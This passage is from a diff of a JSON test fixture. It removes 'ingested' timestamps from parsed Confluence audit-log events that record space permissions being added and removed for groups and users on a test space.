 "original": "{\"timestamp\":\"2021-11-23T00:39:37.592Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -4856,7 +4806,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-24T00:46:29.837503517Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.588Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -4956,7 +4905,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-24T00:46:29.837504385Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.584Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -5056,7 +5004,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-24T00:46:29.837505428Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.580Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -5156,7 +5103,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-24T00:46:29.837506414Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.575Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -5249,7 +5195,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-24T00:46:29.837507395Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.571Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -5349,7 +5294,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-24T00:46:29.837508361Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.567Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -5449,7 +5393,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-24T00:46:29.837509331Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.556Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -5549,7 +5492,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-24T00:46:29.837510491Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.454Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -5642,7 +5584,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-24T00:46:29.837511356Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.444Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -5742,7 +5683,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-24T00:46:29.837512234Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.435Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -5842,7 +5782,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-24T00:46:29.837513107Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.424Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -5942,7 +5881,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-24T00:46:29.837513980Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.404Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -6037,7 +5975,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.removed",
- "ingested": "2021-12-24T00:46:29.837514910Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.393Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -6125,7 +6062,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.removed",
- "ingested": "2021-12-24T00:46:29.837515968Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.375Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"VIEWSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -6213,7 +6149,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.removed",
- "ingested": "2021-12-24T00:46:29.837516934Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.366Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -6301,7 +6236,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.removed",
- "ingested": "2021-12-24T00:46:29.837517809Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.361Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -6389,7 +6323,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.removed",
- "ingested": "2021-12-24T00:46:29.837518804Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.357Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"COMMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -6477,7 +6410,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.removed",
- "ingested": "2021-12-24T00:46:29.837519722Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.350Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -6565,7 +6497,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.removed",
- "ingested": "2021-12-24T00:46:29.837520716Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.342Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -6646,7 +6577,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.removed",
- "ingested": "2021-12-24T00:46:29.837521715Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.330Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -6734,7 +6664,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.removed",
- "ingested": "2021-12-24T00:46:29.837522678Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.324Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -6822,7 +6751,6 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.removed",
- "ingested": "2021-12-24T00:46:29.837523660Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.311Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test 